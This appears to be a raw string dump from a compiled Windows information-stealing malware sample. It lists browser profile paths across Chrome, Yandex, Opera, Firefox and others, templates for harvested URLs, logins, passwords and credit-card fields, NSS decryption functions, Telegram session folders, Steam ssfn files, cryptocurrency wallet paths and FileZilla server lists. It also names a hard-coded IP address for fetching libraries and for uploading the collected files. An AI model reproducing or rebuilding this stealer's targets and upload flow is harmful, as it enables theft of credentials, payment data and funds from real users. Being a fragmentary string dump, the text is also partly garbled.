- Amigo.txt %s\Amigo\User Data\Default a GOOGLE.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch.txt a Opera.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium.txt a Maxthon5.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc.txt a GOOGLE.txt 
%s\Google\Chrome\User Data\Profile 1 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 4 a Amigo.txt %s\Amigo\User Data\Profile 4 a Amigo.txt %s\Amigo\User Data\Profile 1 a Amigo.txt %s\Amigo\User Data\Profile 2 a Amigo.txt %s\Amigo\User Data\Profile 3 a %s a %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s Name Card: %s
- Expiration Month: %s
- Expiration Year: %s
- Number Card: %s
- Billing address id: %s
- Email: %s
- Number: %s
- First name: %s
- Middle name: %s
- Last name: %s
- Full name: %s
- Ñompany name: %s
- Street address: %s
- Dependent locality: %s
- City: %s
- State: %s
- Zipcode: %s
- a %s %s %s %s %s TRUE %s FALSE %s %s %s
- templogim Cookies %s\%s templogim templogik Web Data %s\%s templogik Amigo_Cookies.txt %s\Amigo\User Data\Default a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi_Cookies.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex_Cookies.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa_Cookies.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum_Cookies.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo_Cookies.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch_Cookies.txt a Opera_Cookies.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu_Cookies.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler_Cookies.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium_Cookies.txt a Maxthon5_Cookies.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik_Cookies.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 
Epic_Cookies.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc_Cookies.txt a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 4 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 4 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 1 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 2 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 3 a Amigo_CC.txt %s\Amigo\User Data\Default a GOOGLE_CC.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi_CC.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex_CC.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa_CC.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum_CC.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo_CC.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch_CC.txt a Opera_CC.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu_CC.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler_CC.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User 
Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium_CC.txt a Maxthon5_CC.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik_CC.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic_CC.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc_CC.txt a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 4 a Amigo_CC.txt %s\Amigo\User Data\Profile 4 a Amigo_CC.txt %s\Amigo\User Data\Profile 1 a Amigo_CC.txt %s\Amigo\User Data\Profile 2 a Amigo_CC.txt %s\Amigo\User Data\Profile 3 a SOFTWARE\Mozilla\Mozilla Firefox CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox Main \ Install Directory Path Profile0 \ logins result.txt %s %s a URL: %s
- Login: %s
- Password: %s
- hostname %s encryptedUsername encryptedPassword result.txt a URL: %s
- Login: %s
- Password: %s
- %s\%s SELECT * FROM moz_logins; PATH ; PATH= nss3.dll NSS_Init NSS_Shutdown PL_ArenaFinish PR_Cleanup PK11_GetInternalKeySlot PK11_FreeSlot PK11SDR_Decrypt 32.zip http://141.105.71.82/Libs.zip wb result.txt C:\Program Files\Mozilla Firefox\firefox.exe a FireFox
- %s\Mozilla\Firefox\profiles.ini %s\Mozilla\Firefox\%s C:\Program Files\Waterfox\waterfox.exe a Waterfox
- %s\Waterfox\profiles.ini %s\Waterfox\%s C:\Program Files\Pale Moon\palemoon.exe a Pale Moon
- %s\Moonchild Productions\Pale Moon\profiles.ini %s\Moonchild Productions\Pale Moon\%s C:\Program Files\Cyberfox\Cyberfox.exe a Cyberfox
- %s\8pecxstudios\Cyberfox\profiles.ini %s\8pecxstudios\Cyberfox\%s C:\Program Files\NETGATE\Black Hawk\blackhawk.exe a BlackHawk
- %s\NETGATE Technologies\BlackHawk\profiles.ini %s\NETGATE Technologies\BlackHawk\%s a K-Meleon
- %s\K-Meleon\profiles.ini %s\K-Meleon\%s ERROR Don't copy string
- C:\ Error Unable to Allocate Bitmap Memory wb Error Unable to Create Bitmap File D://prosto.bmp S o f t w a r e \ C l a s s e s \ t d e s k t o p . t g \ D e f a u l t I c o n SteamPath S o f t w a r e \ V a l v e \ S t e a m Telegram.exe tdata\D877F783D5D3EF8C1 tdata\D877F783D5D3EF8C0 tdata\D877F783D5D3EF8C\map1 tdata\D877F783D5D3EF8C\map0 Telegram\D877F783D5D3EF8C1 Telegram\D877F783D5D3EF8C0 Telegram\D877F783D5D3EF8C\map1 Telegram\D877F783D5D3EF8C\map0 %Y-%m-%d %H-%M-%S body.out https://api.ipify.org wb r .zip \Steam.exe \ssfn* \ \Config\*.* \Config\ browser\GOOGLE.txt GOOGLE.txt browser\Amigo.txt Amigo.txt browser\Vivaldi.txt Vivaldi.txt browser\YandexBrowser.txt YandexBrowser.txt browser\Kometa.txt Kometa.txt browser\Orbitum.txt Orbitum.txt browser\Comodo.txt Comodo.txt browser\Torch.txt Torch.txt browser\MailRu.txt MailRu.txt browser\rambler.txt rambler.txt browser\Chromium.txt Chromium.txt browser\Sputnik.txt Sputnik.txt browser\Epic.txt Epic.txt browser\CocCoc.txt CocCoc.txt browser\Opera.txt Opera.txt browser\Maxthon5.txt Maxthon5.txt browser\firefox.txt result.txt CC\GOOGLE_CC.txt GOOGLE_CC.txt CC\Amigo_CC.txt Amigo_CC.txt CC\Vivaldi_CC.txt Vivaldi_CC.txt CC\YandexBrowser_CC.txt Yandex_CC.txt CC\Kometa_CC.txt Kometa_CC.txt CC\Orbitum_CC.txt Orbitum_CC.txt CC\Comodo_CC.txt Comodo_CC.txt CC\Torch_CC.txt Torch_CC.txt CC\MailRu_CC.txt MailRu_CC.txt CC\rambler_CC.txt rambler_CC.txt CC\Chromium_CC.txt Chromium_CC.txt CC\Sputnik_CC.txt Sputnik_CC.txt CC\Epic_CC.txt Epic_CC.txt CC\CocCoc_CC.txt CocCoc_CC.txt CC\Opera_CC.txt Opera_CC.txt CC\Maxthon5_CC.txt Maxthon5_CC.txt Cookies\GOOGLE_Cookies.txt GOOGLE_Cookies.txt Cookies\Amigo_Cookies.txt Amigo_Cookies.txt Cookies\Vivaldi_Cookies.txt Vivaldi_Cookies.txt Cookies\YandexBrowser_Cookies.txt Yandex_Cookies.txt Cookies\Kometa_Cookies.txt Kometa_Cookies.txt Cookies\Orbitum_Cookies.txt Orbitum_Cookies.txt Cookies\Comodo_Cookies.txt Comodo_Cookies.txt Cookies\Torch_Cookies.txt Torch_Cookies.txt 
Cookies\MailRu_Cookies.txt MailRu_Cookies.txt Cookies\rambler_Cookies.txt rambler_Cookies.txt Cookies\Chromium_Cookies.txt Chromium_Cookies.txt Cookies\Sputnik_Cookies.txt Sputnik_Cookies.txt Cookies\Epic_Cookies.txt Epic_Cookies.txt Cookies\CocCoc_Cookies.txt CocCoc_Cookies.txt Cookies\Opera_Cookies.txt Opera_Cookies.txt Cookies\Maxthon5_Cookies.txt Maxthon5_Cookies.txt \ \*.txt \*.pfx No files
- Steam\ No files in current directory!
- Steam\Config\ \Armory\ \Armory\*.* \Dash\ \DashCore\*.dat \Bitcoin\wallets\ \Bitcoin\wallets\*.dat \Litecoin\wallets\ \Litecoin\wallets\*.dat \Monero\wallets\ \ *.keys \Doge\ \MultiDoge\*.wallet \Electrum\wallets\ \Electrum\wallets\*.dat \mSIGNA_Bitcoin\wallets\ \mSIGNA_Bitcoin\wallets\*.dat \Ethereum\keystore\ \Ethereum\keystore\* \FileZilla\recentservers.xml FileZilla\recentservers.xml No files in current directory!
- ethereum\ No files in current directory!
- mSIGNA\ No files in current directory!
- Electrum\ No files in current directory!
- Bitcoin\wallets\ No files in current directory!
- Armory\ No files in current directory!
- Dash\ No files in current directory!
- Litecoin\ No files in current directory!
- Doge\ No files in current directory!
- Doge\ No files in current directory!
- txt\ No files in current directory!
- Sertificate\ file af3c4c9f-8ea3-413f-af4b-5700ee9157bc id http://141.105.71.82/Upload/ 32.zip result.txt mozglue.dll nss3.dll nssdbm3.dll softokn3.dll freebl3.dll result_cookies.txt result_CC.txt GOOGLE.txt Amigo.txt Vivaldi.txt Yandex.txt Kometa.txt Orbitum.txt Comodo.txt Torch.txt mailru.txt rambler.txt Chromium.txt Sputnik.txt Epic.txt CocCoc.txt Opera.txt Maxthon5.txt result.txt GOOGLE_CC.txt Amigo_CC.txt Vivaldi_CC.txt Yandex_CC.txt Kometa_CC.txt Orbitum_CC.txt Comodo_CC.txt Torch_CC.txt mailru_CC.txt rambler_CC.txt Chromium_CC.txt Sputnik_CC.txt Epic_CC.txt CocCoc_CC.txt Opera_CC.txt Maxthon5_CC.txt result_CC.txt GOOGLE_Cookies.txt Amigo_Cookies.txt Vivaldi_Cookies.txt Yandex_Cookies.txt Kometa_Cookies.txt Orbitum_Cookies.txt Comodo_Cookies.txt Torch_Cookies.txt mailru_Cookies.txt rambler_Cookies.txt Chromium_Cookies.txt Sputnik_Cookies.txt Epic_Cookies.txt CocCoc_Cookies.txt Opera_Cookies.txt Maxthon5_Cookies.txt result_Cookies.txt body.out r c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c i d x < c o u n t c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c i d x = = c o u n t - 1 |L €|L -0 xX r %4x %4x true false null [
- ,